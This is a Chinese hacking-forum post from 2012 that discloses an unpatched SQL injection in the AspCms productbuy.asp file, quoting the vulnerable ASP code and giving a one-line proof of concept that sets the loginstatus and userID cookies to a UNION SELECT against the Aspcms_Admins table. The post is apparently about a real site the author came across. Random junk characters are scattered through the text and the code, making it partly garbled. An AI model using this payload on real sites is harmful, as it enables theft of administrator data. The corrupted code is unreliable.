好久没上土司了,上来一看发现在删号名单内.....0 K' E+ y7 f' C- S
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
3 Y0 b4 n4 v8 }废话不多说,看代码:
; Y( J7 y( o, B' J: K' M9 Q1 Z' _
<%2 |/ x& I& b* ?
* @: _5 U. w7 }/ b2 k$ Yif action = "buy" then/ M+ E/ w$ u7 r) d5 P' E7 t
2 r$ D7 R7 W7 s/ |' [/ k
addOrder()
9 M' d- Q' T; p% L4 K$ Z( w# c8 u; ~' |
else
1 B* x0 w: k5 g5 U' X, d3 d3 r0 ]/ s6 Q" [7 h [
echoContent()
% x( U( h( f4 P+ ^3 O4 q% R9 v! W
6 @0 a' {) F" r/ A6 [( M, lend if' ^$ B' O9 p! _
) k! A! y# |* e. C
: e0 J( a/ u0 d& m( L$ o9 _/ p2 ]# {3 l; ^$ v& T- e. ~
……略过& m1 ]0 n5 O6 R! Q# a+ N6 t
4 y ]7 [; q5 Y7 Y5 j# T( o* A7 J
4 Q' Q# U) v$ t- G' `/ d
( o+ {' \8 t1 ~8 DSub echoContent()" p$ i( z, w6 {1 n
0 B4 F5 C2 v& |& T8 d dim id& s s3 j# m/ f. u! O
8 V: [1 R* d% z# V8 Q4 G+ o& [, F6 j
id=getForm("id","get"): q7 e# N: g' G
$ y6 O9 |9 B: U6 E7 ] V- H ! Z3 u4 p$ W k) F' n& ~
: q, M" p& p" ]/ a( a' E) Z if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
5 J7 E) y u( S s0 q% j! d+ g0 u( ~
& N( G+ a& b. z3 X! s4 r4 p' R! f # g! n, V( z4 v
5 c) a0 a1 G# S7 Q' M( K. K
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")% V- o( W) A& `8 O6 @
( G5 v3 T4 p) W+ T$ T! k' ~- w
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct$ c2 |8 I% y0 E. ]
- @7 K8 s/ }" ]% a Dim templatePath,tempStr; k% Y7 j; {& u3 ?4 L X B
$ i$ x3 k; R' f3 D5 v templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"* `' X9 |! b% v4 o; [
: o- ?, F/ e! ?0 n
" _- }5 b+ q+ A2 k! g/ p1 [) Z. {5 a0 D' q1 B3 b6 U
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
! ]7 V, n+ K, L5 C& ?4 R0 t1 ~1 A, |
selectproduct=rsObj(0)8 {+ T7 @* Y5 N2 L V# U
' |0 Q3 x3 i6 z + l- s2 A1 W$ r p
+ h8 h" K& o" b/ n Dim linkman,gender,phone,mobile,email,qq,address,postcode: \. m$ g' J" X! X- v
: D4 Z9 {1 h8 _! A+ t6 a if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0' E7 {5 m5 |5 L* O& ]
1 g) P& c/ q+ K
if rCookie("loginstatus")=1 then 7 ^( Q& h5 l# f0 j
1 `# n; J# G$ c+ h3 e8 o" ^
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1"): e( a! ]: E" G. a
) u. ?7 Y* R0 {3 _( t) @5 s linkman=rsObj("truename")' ^9 t% ]( Q% {- _- l
* }) g6 F2 J4 k1 q) ~& t
gender=rsObj("gender")6 a, @2 T2 F) g* G" D0 B
J7 h! {. s& Z8 k
phone=rsObj("phone")3 Z9 C' s9 e E& S
, T) M& j" h9 d% Z1 f$ O& n$ c) x4 v
mobile=rsObj("mobile")
# F) ~* f" M- }6 O* {4 \. w. {& {' N
2 c( ]& C$ t! t+ t2 ]- g email=rsObj("email")% `+ k" E: @; w# r, {% r
. t ?" S5 [ I9 u qq=rsObj("qq")
1 m) Y. A9 Z/ A* F% c5 b
) C1 |/ e9 r ?9 Q6 _9 Z( G0 b address=rsObj("address")/ d; ], d( L3 b" B# i; [
: ^0 ], O! S/ b3 A6 k+ E
postcode=rsObj("postcode")
4 m' V* u( A8 Q5 Q- ^* S) p/ d6 A7 h5 i( l
else
R- v8 w# |/ E3 n
A- p/ O& J- `1 [ i gender=15 p% ^( f; J4 K/ @4 U+ a4 q
( ?0 [2 h$ ~0 h end if1 C D5 P* t0 Y( `* C/ F0 c
+ r+ a/ f/ `2 V4 ^" r+ t( S rsObj.close()" V7 Y" V9 U! F, A% W
6 p4 k- \" {" V T L/ q0 H
" x1 p. s* }: D' c* H- u, d6 a0 v6 [3 A/ S8 i9 T! r
with templateObj & @; i! `* t. H+ u4 `% F, I/ h
7 r) |, a% B9 D" n
.content=loadFile(templatePath)
' K, K$ S1 `2 C" {# @: i6 h: E6 f
7 b; f! k+ U6 H! p- ~ .parseHtml()1 l2 A# D% e# Y. j/ k
- g" V8 D. U( G- @ .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
; i, p9 W( z0 u
4 ?3 r1 Q/ J! P .content=replaceStr(.content,"[aspcms:linkman]",linkman)
7 ~0 @% Y$ e( T9 p& g3 M
( M4 c! _% T0 v .content=replaceStr(.content,"[aspcms:gender]",gender) 5 C" @% H: T6 { M, [
+ ?* h4 z6 u4 r' t
.content=replaceStr(.content,"[aspcms:phone]",phone)
0 c7 {8 r( j$ g. v4 D
* P2 K# E' U2 X4 W .content=replaceStr(.content,"[aspcms:mobile]",mobile)
S/ p7 }. X9 D1 i0 f+ ^& i+ Z- g, u$ D3 G8 R
.content=replaceStr(.content,"[aspcms:email]",email) , ]0 O6 A& L8 t$ E3 @
$ j0 Y4 n" F! h5 I# P
.content=replaceStr(.content,"[aspcms:qq]",qq)
. l' S- U% P3 O* h4 x
0 O0 [1 L+ } f {! Y .content=replaceStr(.content,"[aspcms:address]",address)
, M$ [, m; [, E. I+ g
: i: ?1 f' o. G* p% L .content=replaceStr(.content,"[aspcms:postcode]",postcode) " v% {" X. U" i5 `# t8 e l$ g
2 A$ Y3 b7 |. |9 p4 ~( L6 v .parseCommon() " e; z- L; M8 d. S6 I* b
$ C( d/ r Z% Z5 L: V& Z echo .content & ~; J) V) @5 K: |* v& Y( P" h
$ a4 U) S" m+ v! L3 x& U$ f# U, |! k
end with
( t2 ^+ W6 s+ j
8 p6 t" b; O- _7 Y3 z# e set templateobj =nothing : terminateAllObjects
, a) h2 U4 y! h% e
7 ^% e; _' Z [End Sub& M5 }1 i2 y% b) J2 H3 Z
漏洞很明显,没啥好说的
2 J' X9 |+ Z7 e6 d8 ~+ apoc:6 H8 {! r( R8 |& |5 }0 l, q8 g6 H
9 b0 J5 u% s9 R" v- \) yjavascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子4 X+ J0 c0 a( u' m# x3 U
7 B7 ^3 s5 S+ X" P: _ |
发表于 2012-12-27 08:35:05
收藏
支持
反对